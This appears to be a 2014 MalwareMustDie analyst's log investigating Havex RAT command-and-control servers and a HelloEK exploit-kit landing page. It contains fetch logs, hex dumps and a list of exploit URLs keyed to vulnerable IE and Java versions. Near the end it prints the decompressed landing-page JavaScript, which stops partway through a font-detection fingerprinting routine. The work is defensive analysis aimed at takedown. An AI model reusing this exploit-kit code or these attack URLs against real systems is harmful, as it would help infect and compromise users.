// #MalwareMustDie! @unixfreaxjp
// Is a day off today, I gotta go, so is a half way work,
// To do TASK to our "crusaders":
// 1. Takedown all of the url stated below
// 2. Continue to PoC the payload fetch, the exploit urls are all extracted clearly now.
// Base on report from Gi0vann1 @Sug4r:)) (with thx & #w00t!): http://pastebin.com/2x1JinJd
// also thx to @shibumi for the comm! thx also to @node5 for recognizing LightsOut/Hello EK
// thx for the Set's database to compare the HelloEK's details.

/* The malware is Havex Rat, Bad stuff.  ref: http://www.businessinsider.com/countries-targeted-by-russia-hack-2014-1
suspecting is watering scheme for wide range of hits.. */


// Exploitation Verdict Analysis

EK:
    h00p://mahsms.ir/wp-includes/pomo/dtsrc.php // Landing page EK
    
    EK Details (HelloEK):
     // Infection Checker:
     h00p://mahsms.ir/wp-includes/pomo/dtsrc.php

     // Landing Page PD 
     h00p://mahsms.ir/wp-includes/pomo/dtsrc.php?a=h1&f=51d0f9f5d6d2c5ff3ade4b38bb7c1ceb&u=Mozilla%2F5.0%20(Windows%3B%20U%3B%20MSIE%207.0%3B%20Windows%20NT%205.2)%20Java%2F1.5.0_08 

     // Exploit:
    h00p://mahsms.ir/wp-includes/pomo/dtsrc.php?a=h2 Non IE Java <= 1.7.17
    h00p://mahsms.ir/wp-includes/pomo/dtsrc.php?a=h3 IE 7 Java <= 1.7.17
    h00p://mahsms.ir/wp-includes/pomo/dtsrc.php?a=h4 IE 6 Win < 6
    h00p://mahsms.ir/wp-includes/pomo/dtsrc.php?a=h5 IE 7 Win/NT < 6 Java <= 1.7.17
    h00p://mahsms.ir/wp-includes/pomo/dtsrc.php?a=h6 IE 8 Win < 6
    h00p://mahsms.ir/wp-includes/pomo/dtsrc.php?a=h7 Non IE Java <= 1.6.32

// HAVEX CNC CHECKED:
    h00p://pekanin.freevar.com/include/template/isx.php   // (null)
    h00p://simpsons.freesexycomics.com/wp06/wp-includes/po.php // (encoded CNC hexcode)
    h00p://toons.freesexycomics.com/wp08/wp-includes/dtcla.php // (encoded CNC hexcode)
    h00p://www.pc-service-fm.de/modules/mod_search/src.php // <!--havexhavex-->
    h00p://artem.sataev.com/blog/wp-includes/pomo/src.php // 404
    h00p://swissitaly.com/includes/phpmailer/class.pop3.php // 404

// Chapter:
// Follow up details
// Exploit Kit part
// 
// =================
// Follow up details:
// =================

// FIRST URL ONLY...

--- fetch header ----
Date: 2014-03-11 09:25:15
URL: http://pekanin.freevar.com/include/template/isx.php
Resolving pekanin.freevar.com (pekanin.freevar.com)... 5.9.82.27
Caching pekanin.freevar.com => 5.9.82.27
Connecting to pekanin.freevar.com (pekanin.freevar.com)|5.9.82.27|:80... connected.

---request begin---
GET /include/template/isx.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: pekanin.freevar.com
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
HTTP request sent, awaiting response...

---response begin---
HTTP/1.1 200 OK
Date: Tue, 11 Mar 2014 00:25:16 GMT
Server: Apache
X-Powered-By: PHP/5.4.17
Cache-Control: no-cache
Keep-Alive: timeout=1, max=10000
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
Saving to: 'isx.php'
2014-03-11 09:25:17 (5.27 MB/s) - 'isx.php' saved [723]


$ date
Tue Mar 11 09:29:14 JST 2014
$
$ cat isx.php
<html><head><mega http-equiv='CACHE-CONTROL' content='NO-CACHE'></head><body>No data!<!--havexhavex-->
<!-- Free Web Hosting Area Start -->
<script type="text/javascript" src="http://user99.freewebhostingarea.com/a/gfreeh.js"></script>
<script type="text/javascript" src="http://user99.freewebhostingarea.com/a/in300.js"></script>
<script type="text/javascript" src="http://user99.freewebhostingarea.com/a/specoff.js"></script>
<noscript><br><center><font color='#000000' face='Verdana' style='font-size: 11px; background-color:#FFFFFF'><a target='_blank' href='http://www.freewebhostingarea.com'><font color='#000000'>Free Web Hosting</font></a></font></center></noscript>
<!-- Free Web Hosting Area End -->
</body></head>$

$ date
Tue Mar 11 09:29:46 JST 2014
$ wget -nv http://user99.freewebhostingarea.com/a/gfreeh.js
2014-03-11 09:29:56 URL:http://user99.freewebhostingarea.com/a/gfreeh.js [935/935] -> "gfreeh.js" [1]
$ wget -nv http://user99.freewebhostingarea.com/a/in300.js
2014-03-11 09:30:15 URL:http://user99.freewebhostingarea.com/a/in300.js [935/935] -> "in300.js" [1]
$ wget -nv http://user99.freewebhostingarea.com/a/specoff.js
2014-03-11 09:30:33 URL:http://user99.freewebhostingarea.com/a/specoff.js [935/935] -> "specoff.js" [1]
$
$ date
Tue Mar 11 09:30:38 JST 2014
$

$ cat gfreeh.js
var m3_u = (location.protocol=='https:'?'https://user99.freewebhostingarea.com/po/www/delivery/ajs.php':'http://user99.freewebhostingarea.com/po/www/delivery/ajs.php');
var m3_r = Math.floor(Math.random()*99999999999);
if (!document.MAX_used) document.MAX_used = ',';
document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
document.write ("?zoneid=3");
document.write ('&amp;cb=' + m3_r);
if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : ''));
document.write ("&amp;loc=" + escape(window.location));
if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
if (document.context) document.write ("&context=" + escape(document.context));
if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
document.write ("'><\/scr"+"ipt>");
$
$
$
$ cat in300.js
var m3_u = (location.protocol=='https:'?'https://user99.freewebhostingarea.com/po/www/delivery/ajs.php':'http://user99.freewebhostingarea.com/po/www/delivery/ajs.php');
var m3_r = Math.floor(Math.random()*99999999999);
if (!document.MAX_used) document.MAX_used = ',';
document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
document.write ("?zoneid=12");
document.write ('&amp;cb=' + m3_r);
if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : ''));
document.write ("&amp;loc=" + escape(window.location));
if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
if (document.context) document.write ("&context=" + escape(document.context));
if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
document.write ("'><\/scr"+"ipt>");$
$
$
$
$ cat specoff.js
var m3_u = (location.protocol=='https:'?'https://user99.freewebhostingarea.com/po/www/delivery/ajs.php':'http://user99.freewebhostingarea.com/po/www/delivery/ajs.php');
var m3_r = Math.floor(Math.random()*99999999999);
if (!document.MAX_used) document.MAX_used = ',';
document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
document.write ("?zoneid=10");
document.write ('&amp;cb=' + m3_r);
if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : ''));
document.write ("&amp;loc=" + escape(window.location));
if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
if (document.context) document.write ("&context=" + escape(document.context));
if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
document.write ("'><\/scr"+"ipt>");$
$


// Target

-- Fetch header --
Date: 2014-03-11 09:37:24  
URL: http://user99.freewebhostingarea.com/po/www/delivery/ajs.php
Resolving user99.freewebhostingarea.com (user99.freewebhostingarea.com)... 64.31.54.149
Caching user99.freewebhostingarea.com => 64.31.54.149
Connecting to user99.freewebhostingarea.com (user99.freewebhostingarea.com)|64.31.54.149|:80... connected.

---request begin---
GET /po/www/delivery/ajs.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: user99.freewebhostingarea.com
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
HTTP request sent, awaiting response...

---response begin---
HTTP/1.1 200 OK
Date: Tue, 11 Mar 2014 00:37:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.27
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAGEO=JP%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C; path=/
Set-Cookie: OAID=cb77d5dfd349d4c0a5c28a208693a25d; expires=Wed, 11-Mar-2015 00:37:25 GMT; path=/
Content-Length: 52
Keep-Alive: timeout=1, max=10000
Connection: Keep-Alive
Content-Type: text/javascript; charset=UTF-8
200 OK
Stored cookie user99.freewebhostingarea.com -1 (ANY) / <session> <insecure> [expiry none] OAGEO JP%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C
Stored cookie user99.freewebhostingarea.com -1 (ANY) / <permanent> <insecure> [expiry 2015-03-11 09:37:25] OAID cb77d5dfd349d4c0a5c28a208693a25d
URI content encoding = 'UTF-8'
Length: 52 [text/javascript]
Saving to: 'ajs.php'
2014-03-11 09:37:25 (1.01 MB/s) - 'ajs.php' saved [52/52]


// Details:

$
$ date
Tue Mar 11 09:40:22 JST 2014
$
$ cat ajs.php
var OX_031eb7b0 = '';

document.write(OX_031eb7b0);
$

// This should lead to a (new) null CVE??? #lol :-)


// SECOND URL ONLY..


-- Fetch Header --  
Date: 2014-03-11 09:44:26
URL: http://simpsons.freesexycomics.com/wp06/wp-includes/po.php
Resolving simpsons.freesexycomics.com (simpsons.freesexycomics.com)... 198.63.208.206
Caching simpsons.freesexycomics.com => 198.63.208.206
Connecting to simpsons.freesexycomics.com (simpsons.freesexycomics.com)|198.63.208.206|:80... connected.

---request begin---
GET /wp06/wp-includes/po.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: simpsons.freesexycomics.com
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
HTTP request sent, awaiting response...

---response begin---
HTTP/1.1 200 OK
Date: Tue, 11 Mar 2014 00:44:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache
Content-Encoding: gzip
200 OK
Saving to: 'po.php'
2014-03-11 09:44:27 (468 KB/s) - 'po.php' saved [147]



// insides..


$ date
Tue Mar 11 09:45:49 JST 2014
$
$$
$ less po.php
"po.php" may be a binary file.  See it anyway?
^_<8B>^H^@^@^@^@^@^@^C%<CE>A
<C2>0^P^E<D0><AB><8C><AB>l^\<BD>@^Z<90> <B8><90>^F<D4>^KD34^E<9B><B4><D3>i1<B7>7<D6><CD>l<FE><FF><8F><D1>Q<86><B7><D1><91>|0z<A0><CE>C^T^Y<91><A6><A5>_ESCeO
<F6>rF<EB><DA><C7><CD>]^U<BC>r^RJ<D2><A8><D6><E1>^V)<A3><8F><FF><E9>3<87>b<EE><99><B9><EC>!^|<AD>3<D3><<E6>^T<FA><D4>A<C9>^K^CW<98>f9<E8>^]b<F4>+}<B6><83>X
<9D>M<A8><DC><EF><9F>/<83>m!<C8><96>^@^@^@
$
$
$ bincat po.php
0000   1F 8B 08 00 00 00 00 00 00 03 25 CE 41 0A C2 30    ..........%.A..0
0010   10 05 D0 AB 8C AB 6C 1C BD 40 1A 90 20 B8 90 06    ......l..@.. ...
0020   D4 0B 44 33 34 05 9B B4 D3 69 31 B7 37 D6 CD 6C    ..D34....i1.7..l
0030   FE FF 8F D1 51 86 B7 D1 91 7C 30 7A A0 CE 43 14    ....Q....|0z..C.
0040   19 91 A6 A5 5F 1B 65 4F F6 72 46 EB DA C7 CD 5D    ...._.eO.rF....]
0050   15 BC 72 12 4A D2 A8 D6 E1 16 29 A3 8F FF E9 33    ..r.J.....)....3
0060   87 62 EE 99 B9 EC 21 65 08 5E 7C AD 33 D3 3C E6    .b....!e.^|.3.<.
0070   14 FA D4 41 C9 0B 03 57 98 66 39 E8 1D 62 F4 2B    ...A...W.f9..b.+
0080   7D B6 83 58 9D 4D A8 DC EF 9F 2F 83 6D 21 C8 96    }..X.M..../.m!..
0090   00 00 00                                           ...


// encoded globs. No sample, can not do much yet, hang on...

// THIRD URL..

http://toons.freesexycomics.com/wp08/wp-includes/dtcla.php


$ date
Tue Mar 11 09:51:55 JST 2014
$
---Fetch header---
Date: 2014-03-11 09:52:11
URL: http://toons.freesexycomics.com/wp08/wp-includes/dtcla.php
Resolving toons.freesexycomics.com (toons.freesexycomics.com)... 198.63.208.206
Caching toons.freesexycomics.com => 198.63.208.206
Connecting to toons.freesexycomics.com (toons.freesexycomics.com)|198.63.208.206|:80... connected.

---request begin---
GET /wp08/wp-includes/dtcla.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: toons.freesexycomics.com
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
HTTP request sent, awaiting response...

---response begin---
HTTP/1.1 200 OK
Date: Tue, 11 Mar 2014 00:52:12 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache
Content-Encoding: gzip
200 OK
Length: unspecified [text/html]
Saving to: 'dtcla.php'
2014-03-11 09:52:12 (470 KB/s) - 'dtcla.php' saved [147]


$ date
Tue Mar 11 09:54:14 JST 2014
$ less dtcla.php
"dtcla.php" may be a binary file.  See it anyway?
^_<8B>^H^@^@^@^@^@^@^C%<CE>A
<C2>0^P^E<D0><AB><8C><AB>l^\<BD>@^Z<90> <B8><90>^F<D4>^KD34^E<9B><B4><D3>i1<B7>7<D6><CD>l<FE><FF><8F><D1>Q<86><B7><D1><91>|0z<A0><CE>C^T^Y<91><A6><A5>_ESCeO
<F6>rF<EB><DA><C7><CD>]^U<BC>r^RJ<D2><A8><D6><E1>^V)<A3><8F><FF><E9>3<87>b<EE><99><B9><EC>!^|<AD>3<D3><<E6>^T<FA><D4>A<C9>^K^CW<98>f9<E8>^]b<F4>+}<B6><83>X
<9D>M<A8><DC><EF><9F>/<83>m!<C8><96>^@^@^@
$
$ bincat dtcla.php
0000   1F 8B 08 00 00 00 00 00 00 03 25 CE 41 0A C2 30    ..........%.A..0
0010   10 05 D0 AB 8C AB 6C 1C BD 40 1A 90 20 B8 90 06    ......l..@.. ...
0020   D4 0B 44 33 34 05 9B B4 D3 69 31 B7 37 D6 CD 6C    ..D34....i1.7..l
0030   FE FF 8F D1 51 86 B7 D1 91 7C 30 7A A0 CE 43 14    ....Q....|0z..C.
0040   19 91 A6 A5 5F 1B 65 4F F6 72 46 EB DA C7 CD 5D    ...._.eO.rF....]
0050   15 BC 72 12 4A D2 A8 D6 E1 16 29 A3 8F FF E9 33    ..r.J.....)....3
0060   87 62 EE 99 B9 EC 21 65 08 5E 7C AD 33 D3 3C E6    .b....!e.^|.3.<.
0070   14 FA D4 41 C9 0B 03 57 98 66 39 E8 1D 62 F4 2B    ...A...W.f9..b.+
0080   7D B6 83 58 9D 4D A8 DC EF 9F 2F 83 6D 21 C8 96    }..X.M..../.m!..
0090   00 00 00                                           ...

// Exactly same CVE as previous one..

$ date
Tue Mar 11 09:56:11 JST 2014
$
$ vt check dtcla.php |less
-----------------------------------------------------------
VT-shell 1.1 FreeBSD version - by @unixfreaxjp
Usage is: /usr/local/bin/vt COMMAND(check | scan) and PATH(a correct full-path-to-sample)
-----------------------------------------------------------
Sample : dtcla.php
MD5    : 2d43b8539ee3aff06feab586191dc2a1
SHA256 : 37dedc60b1fbdf89160c7cb9258f87162725103fecf8b4b1d6b538ae7e4ec7fe
URL    : https://www.virustotal.com/latest-scan/37dedc60b1fbdf89160c7cb9258f87162725103fecf8b4b1d6b538ae7e4ec7fe
-----------------------------------------------------------
   VirusTotal

File not found

$
$
// I feel weird...Uploading this now..
// uploaded this to the VT here:
// https://www.virustotal.com/en/file/37dedc60b1fbdf89160c7cb9258f87162725103fecf8b4b1d6b538ae7e4ec7fe/analysis/1394499588/



// FORTH URL:

http://www.pc-service-fm.de/modules/mod_search/src.php

$ date
Tue Mar 11 10:08:23 JST 2014
$
-- Fetch header ---
Date: 2014-03-11 10:08:38
URL: http://www.pc-service-fm.de/modules/mod_search/src.php
Resolving www.pc-service-fm.de (www.pc-service-fm.de)... 81.169.145.163
Caching www.pc-service-fm.de => 81.169.145.163
Connecting to www.pc-service-fm.de (www.pc-service-fm.de)|81.169.145.163|:80... connected.

---request begin---
GET /modules/mod_search/src.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: www.pc-service-fm.de
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
HTTP request sent, awaiting response...

---response begin---
HTTP/1.1 200 OK
Date: Tue, 11 Mar 2014 01:08:44 GMT
Server: Apache/2.2.26 (Unix)
X-Powered-By: PHP/5.3.28
Cache-Control: no-cache
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
200 OK
Length: unspecified [text/html]
Saving to: 'src.php'
2014-03-11 10:08:45 (1.23 MB/s) - 'src.php' saved [150]


$ date
Tue Mar 11 10:10:25 JST 2014
$
$ cat src.php
<html><head><mega http-equiv='CACHE-CONTROL' content='NO-CACHE'></head><body>Sorry, no data corresponding your request.<!--havexhavex--></body></html>$
$
// WE GOT THE VERDICT..
//this is a positive PoC of HAVEX-RAT CNC

// FIFTH URL..

http://artem.sataev.com/blog/wp-includes/pomo/src.php
2014-03-11 10:16:15 ERROR 404: Not Found.


// SIXTH URL:

http://swissitaly.com/includes/phpmailer/class.pop3.php
2014-03-11 10:19:59 ERROR 404: Not Found.


// ==============================
// JOURNEY TO THE EXPLOIT KIT...
// Say hello to series of jars via
// Old friend PluginDetect.
// ==============================

// SEVENTH URL..

http://mahsms.ir/wp-includes/pomo/dtsrc.php

// THis is a kind of ticket to the landing page...
// We'll see...


-- Fetch header --
Date: 2014-03-11 10:22:04--  
URL: http://mahsms.ir/wp-includes/pomo/dtsrc.php
Resolving mahsms.ir (mahsms.ir)... 176.9.92.69
Caching mahsms.ir => 176.9.92.69
Connecting to mahsms.ir (mahsms.ir)|176.9.92.69|:80... connected.

---request begin---
GET /wp-includes/pomo/dtsrc.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: mahsms.ir
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
HTTP request sent, awaiting response...

---response begin---
HTTP/1.1 200 OK
Content-Encoding: gzip
Vary: Accept-Encoding
Date: Tue, 11 Mar 2014 01:22:06 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 8115
200 OK
Length: 8115 (7.9K) [text/html]
Saving to: 'dtsrc.php'
2014-03-11 10:22:06 (3.37 MB/s) - 'dtsrc.php' saved [8115/8115]


$
$ date && less dtsrc.php
Tue Mar 11 10:24:00 JST 2014
"dtsrc.php" may be a binary file.  See it anyway?
^_<8B>^H^@^@^@^@^@^D^C<95>\<FD>rESC<B9><91><FF>^?<AB>
[...]
<F1><87>W<F2>^V&<C0><BE><98><FF><89><B5>^_<FF>^O<8F>\F~<8C>M^@^@
$
$ bincat dtsrc.php
0000   1F 8B 08 00 00 00 00 00 04 03 95 5C FD 72 1B B9    .............r..
0010   91 FF 7F AB F6 1D E6 54 75 2B EA 6C C9 1C 7E 73    .......Tu+.l..~s
0020   B3 DE 94 44 7D DA 92 AC 13 29 3B 1B 67 73 05 92    ...D}....);.gs..
0030   20 39 E6 70 86 3B 1F 12 E9 75 F2 06 F7 20 79 81     9.p.;...u... y.
0040   7B 81 D4 BD D7 FD BA 1B C0 0C 29 AE 37 A7 4A 96    {.........).7.J.
0050   00 A6 D1 D3 68 F4 37 30 FE 61 96 2D 42 6F B5 08    ....h.70.a.-Bo..
   [...]
1F20   A7 94 06 3E 46 DD 55 D1 57 47 F6 AB 15 42 ED 95    ...>F.U.WG...B..
1F30   D5 E8 37 10 57 F6 68 22 6C 89 9D E8 88 FA E1 55    ..7.W.h"l......U
1F40   CA 59 18 FD 33 66 AF 66 E6 DF 33 A3 2F DE 68 E0    .Y..3f.f..3./.h.
1F50   DD C9 9B B3 DE C0 0B C6 AF 4B DF BB 78 BD EB E3    .........K..x...
1F60   7E FF EA F4 F5 DE 08 17 6F C6 DF E3 DF 8A A9 4E    ~.......o......N
1F70   F0 EF 81 1D 76 3B C3 E6 A1 EF 8F 26 87 C3 61 A7    ....v;.....&..a.
1F80   76 58 AD 2A 55 AD 0E C7 23 5D 1D EE 79 2C C9 AF    vX.*U...#]..y,..
1F90   F7 AA CB D5 1E BE 33 A5 6B 29 D2 F9 F1 87 57 F2    ......3.k)....W.
1FA0   16 26 C0 BE 98 FF 89 B5 1F FF 0F 8F 5C 46 7E 8C    .&...........F~.
1FB0   4D 00 00                                           M..

// Seeing the bits is the gunzip format. Unwrapped and see it..

$ date
Tue Mar 11 10:33:27 JST 2014
$
$ cp dtsrc.php dtsrc.gz
$ gunzip dtsrc.gz
$
$ ls dtsrc*
dtsrc   dtsrc.php
$
$ bincat dtsrc
0000   3C 68 74 6D 6C 20 78 6D 6C 6E 73 3D 22 68 74 74    <html xmlns="htt
0010   70 3A 2F 2F 77 77 77 2E 77 33 2E 6F 72 67 2F 31    p://www.w3.org/1
0020   39 39 39 2F 68 74 6D 6C 22 3E 0D 0A 3C 68 65 61    999/html">..<hea
0030   64 3E 0D 0A 3C 73 63 72 69 70 74 20 74 79 70 65    d>..<script type
0040   3D 22 74 65 78 74 2F 6A 61 76 61 73 63 72 69 70    ="text/javascrip
0050   74 22 3E 0D 0A 66 75 6E 63 74 69 6F 6E 20 6D 64    t">..function md
0060   35 63 79 63 6C 65 28 78 2C 20 6B 29 20 7B 0D 0A    5cycle(x, k) {..
[..]

// in text... Just another redirector boobytraps...a ticket..
// w/ CVE-2013-2882.. the fuzzy in font-names..

<html xmlns="http://www.w3.org/1999/html">
<head>
<script type="text/javascript">
function md5cycle(x, k) {
    var a = x[0], b = x[1], c = x[2], d = x[3];

    a = ff(a, b, c, d, k[0], 7, -680876936);
    d = ff(d, a, b, c, k[1], 12, -389564586);
    c = ff(c, d, a, b, k[2], 17, 606105819);
    b = ff(b, c, d, a, k[3], 22, -1044525330);
    a = ff(a, b, c, d, k[4], 7, -176418897);
    d = ff(d, a, b, c, k[5], 12, 1200080426);
    c = ff(c, d, a, b, k[6], 17, -1473231341);
    b = ff(b, c, d, a, k[7], 22, -45705983);
    a = ff(a, b, c, d, k[8], 7, 1770035416);
    d = ff(d, a, b, c, k[9], 12, -1958414417);
    c = ff(c, d, a, b, k[10], 17, -42063);
    b = ff(b, c, d, a, k[11], 22, -1990404162);
    a = ff(a, b, c, d, k[12], 7, 1804603682);
    d = ff(d, a, b, c, k[13], 12, -40341101);
    c = ff(c, d, a, b, k[14], 17, -1502002290);
    b = ff(b, c, d, a, k[15], 22, 1236535329);

    a = gg(a, b, c, d, k[1], 5, -165796510);
    d = gg(d, a, b, c, k[6], 9, -1069501632);
    c = gg(c, d, a, b, k[11], 14, 643717713);
    b = gg(b, c, d, a, k[0], 20, -373897302);
    a = gg(a, b, c, d, k[5], 5, -701558691);
    d = gg(d, a, b, c, k[10], 9, 38016083);
    c = gg(c, d, a, b, k[15], 14, -660478335);
    b = gg(b, c, d, a, k[4], 20, -405537848);
    a = gg(a, b, c, d, k[9], 5, 568446438);
    d = gg(d, a, b, c, k[14], 9, -1019803690);
    c = gg(c, d, a, b, k[3], 14, -187363961);
    b = gg(b, c, d, a, k[8], 20, 1163531501);
    a = gg(a, b, c, d, k[13], 5, -1444681467);
    d = gg(d, a, b, c, k[2], 9, -51403784);
    c = gg(c, d, a, b, k[7], 14, 1735328473);
    b = gg(b, c, d, a, k[12], 20, -1926607734);

    a = hh(a, b, c, d, k[5], 4, -378558);
    d = hh(d, a, b, c, k[8], 11, -2022574463);
    c = hh(c, d, a, b, k[11], 16, 1839030562);
    b = hh(b, c, d, a, k[14], 23, -35309556);
    a = hh(a, b, c, d, k[1], 4, -1530992060);
    d = hh(d, a, b, c, k[4], 11, 1272893353);
    c = hh(c, d, a, b, k[7], 16, -155497632);
    b = hh(b, c, d, a, k[10], 23, -1094730640);
    a = hh(a, b, c, d, k[13], 4, 681279174);
    d = hh(d, a, b, c, k[0], 11, -358537222);
    c = hh(c, d, a, b, k[3], 16, -722521979);
    b = hh(b, c, d, a, k[6], 23, 76029189);
    a = hh(a, b, c, d, k[9], 4, -640364487);
    d = hh(d, a, b, c, k[12], 11, -421815835);
    c = hh(c, d, a, b, k[15], 16, 530742520);
    b = hh(b, c, d, a, k[2], 23, -995338651);

    a = ii(a, b, c, d, k[0], 6, -198630844);
    d = ii(d, a, b, c, k[7], 10, 1126891415);
    c = ii(c, d, a, b, k[14], 15, -1416354905);
    b = ii(b, c, d, a, k[5], 21, -57434055);
    a = ii(a, b, c, d, k[12], 6, 1700485571);
    d = ii(d, a, b, c, k[3], 10, -1894986606);
    c = ii(c, d, a, b, k[10], 15, -1051523);
    b = ii(b, c, d, a, k[1], 21, -2054922799);
    a = ii(a, b, c, d, k[8], 6, 1873313359);
    d = ii(d, a, b, c, k[15], 10, -30611744);
    c = ii(c, d, a, b, k[6], 15, -1560198380);
    b = ii(b, c, d, a, k[13], 21, 1309151649);
    a = ii(a, b, c, d, k[4], 6, -145523070);
    d = ii(d, a, b, c, k[11], 10, -1120210379);
    c = ii(c, d, a, b, k[2], 15, 718787259);
    b = ii(b, c, d, a, k[9], 21, -343485551);

    x[0] = add32(a, x[0]);
    x[1] = add32(b, x[1]);
    x[2] = add32(c, x[2]);
    x[3] = add32(d, x[3]);

}

function cmn(q, a, b, x, s, t) {
    a = add32(add32(a, q), add32(x, t));
    return add32((a << s) | (a >>> (32 - s)), b);
}

function ff(a, b, c, d, x, s, t) {
    return cmn((b & c) | ((~b) & d), a, b, x, s, t);
}

function gg(a, b, c, d, x, s, t) {
    return cmn((b & d) | (c & (~d)), a, b, x, s, t);
}

function hh(a, b, c, d, x, s, t) {
    return cmn(b ^ c ^ d, a, b, x, s, t);
}

function ii(a, b, c, d, x, s, t) {
    return cmn(c ^ (b | (~d)), a, b, x, s, t);
}

function md51(s) {
    var n = s.length,
            state = [1732584193, -271733879, -1732584194, 271733878], i;
    for (i = 64; i <= s.length; i += 64) {
        md5cycle(state, md5blk(s.substring(i - 64, i)));
    }
    s = s.substring(i - 64);
    var tail = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0];
    for (i = 0; i < s.length; i++)
        tail[i >> 2] |= s.charCodeAt(i) << ((i % 4) << 3);
    tail[i >> 2] |= 0x80 << ((i % 4) << 3);
    if (i > 55) {
        md5cycle(state, tail);
        for (i = 0; i < 16; i++) tail[i] = 0;
    }
    tail[14] = n * 8;
    md5cycle(state, tail);
    return state;
}

function md5blk(s) {
    var md5blks = [], i;
    for (i = 0; i < 64; i += 4) {
        md5blks[i >> 2] = s.charCodeAt(i)
                + (s.charCodeAt(i + 1) << 8)
                + (s.charCodeAt(i + 2) << 16)
                + (s.charCodeAt(i + 3) << 24);
    }
    return md5blks;
}

var hex_chr = '0123456789abcdef'.split('');

function rhex(n) {
    var s = '', j = 0;
    for (; j < 4; j++)
        s += hex_chr[(n >> (j * 8 + 4)) & 0x0F]
                + hex_chr[(n >> (j * 8)) & 0x0F];
    return s;
}

function hex(x) {
    for (var i = 0; i < x.length; i++)
        x[i] = rhex(x[i]);
    return x.join('');
}

function md5(s) {
    return hex(md51(s));
}

function add32(a, b) {
    return (a + b) & 0xFFFFFFFF;
}

if (md5('hello') != '5d41402abc4b2a76b9719d911017c592') {
    function add32(x, y) {
        var lsw = (x & 0xFFFF) + (y & 0xFFFF),
                msw = (x >> 16) + (y >> 16) + (lsw >> 16);
        return (msw << 16) | (lsw & 0xFFFF);
    }
}

var Detector = function () {
    var baseFonts = ['monospace', 'sans-serif', 'serif'];
    var testString = "wwwmmmmmmmmmmlli";
    var testSize = '72px';
    var h = document.getElementsByTagName("body")[0];
    var s = document.createElement("span");
    s.style.fontSize = testSize;
    s.style.visibility = "hidden";
